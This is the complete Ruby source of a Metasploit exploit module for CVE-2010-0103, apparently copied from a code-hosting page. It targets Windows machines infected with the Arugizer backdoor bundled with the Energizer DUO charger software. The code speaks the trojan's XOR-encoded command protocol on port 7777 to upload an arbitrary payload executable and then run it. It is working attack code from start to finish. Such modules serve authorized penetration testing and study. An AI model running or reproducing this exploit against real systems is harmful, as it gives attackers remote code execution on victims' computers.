Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::EXE
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution',
15
      'Description'    => %q{
16
          This module will execute an arbitrary payload against
17
        any system infected with the Arugizer trojan horse. This
18
        backdoor was shipped with the software package accompanying
19
        the Energizer DUO USB battery charger.
20
      },
21
      'Author'         => [ 'hdm' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          ['CVE', '2010-0103'],
26
          ['OSVDB', '62782'],
27
          ['US-CERT-VU', '154421']
28
        ],
29
      'Platform'       => 'win',
30
      'Targets'        =>
31
        [
32
          [ 'Automatic', { } ],
33
        ],
34
      'DefaultTarget'  => 0,
35
      'DisclosureDate' => '2010-03-05'
36
      ))
37

38

39
    register_options(
40
      [
41
        Opt::RPORT(7777),
42
      ])
43
  end
44

45
  def trojan_encode(str)
46
    str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
47
  end
48

49
  def trojan_command(cmd)
50
    cid = ""
51

52
    case cmd
53
    when :exec
54
      cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
55
    when :dir
56
      cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
57
    when :write
58
      cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
59
    when :read
60
      cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
61
    when :nop
62
      cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
63
    when :find
64
      cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
65
    when :yes
66
      cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
67
    when :runonce
68
      cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
69
    when :delete
70
      cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
71
    end
72

73
    trojan_encode(
74
      [cid.length + 1].pack("V") + cid  + "\x00"
75
    )
76
  end
77

78
  def exploit
79

80
    nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
81
    exe = generate_payload_exe + "\x00"
82

83

84
    print_status("Trying to upload #{nam}...")
85
    connect
86

87
    # Write file request
88
    sock.put(trojan_command(:write))
89
    sock.put(trojan_encode([nam.length].pack("V")))
90
    sock.put(trojan_encode(nam))
91
    sock.put(trojan_encode([exe.length].pack("V")))
92
    sock.put(trojan_encode(exe))
93

94
    # Required to prevent the server from spinning a loop
95
    sock.put(trojan_command(:nop))
96

97
    disconnect
98

99
    #
100
    # Execute the payload
101
    #
102

103
    print_status("Trying to execute #{nam}...")
104

105
    connect
106

107
    # Execute file request
108
    sock.put(trojan_command(:exec))
109
    sock.put(trojan_encode([nam.length].pack("V")))
110
    sock.put(trojan_encode(nam))
111

112
    # Required to prevent the server from spinning a loop
113
    sock.put(trojan_command(:nop))
114

115
    disconnect
116
  end
117
end
118

119